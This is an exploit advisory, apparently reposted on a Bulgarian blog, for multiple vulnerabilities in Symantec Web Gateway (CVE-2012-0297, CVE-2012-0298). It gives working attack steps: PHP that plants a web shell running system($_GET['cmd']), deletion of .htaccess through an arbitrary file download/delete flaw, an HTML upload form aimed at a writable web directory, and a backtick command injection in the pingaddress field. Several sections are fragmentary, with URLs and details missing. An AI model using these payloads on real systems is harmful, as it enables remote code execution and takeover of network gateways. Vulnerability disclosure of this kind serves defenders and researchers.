Software: Symantec Web Gateway
Current Software Version:
Product homepage:
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???

File include:

File include and OS command execution:
        You can execute OS commands just include the error_log:
        -rw-r--r--   1 root   root  5925 Nov 15 07:25 access_log
        -rw-r--r--   1 root   root  3460 Nov 15 07:21 error_log

        Make a connection to port 80:
        $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
        $cmd = "<?php system(\$_GET['cmd']); ?>";
		print "Shell creation done<br>";

Arbitary file download and delete:
	d parameter: the complete filename 
        After the download process application removes the original file with root access! :)

        Command execution methods:
        Download and delete the /var/www/html/ciu/.htaccess file.
        After it you can access the ciu interface on web.
        There is an upload script: /ciu/uploadFile.php
	User can control the filename and the upload location:

        <form action="" method="POST" enctype="multipart/form-data">
        <input type="file" name="uploadFile">
        <input type="text" name="action" value="upload">
        <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
        <input type="hidden" name="configuration" value="test">
        <input type="submit" value="upload!">
	The "/var/www/html/spywall/cleaner" is writeable by www-data.

Command execution after authentication: (this is deprecated config file, it should be remove)

        From the modified POST message:
        Content-Disposition: form-data; name="pingaddress"`whoami>/tmp/1234.txt`

Rate this post
Брой прочитания на тази страница: 944
Symantec Web Gateway Multiple Vulnerabilities

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *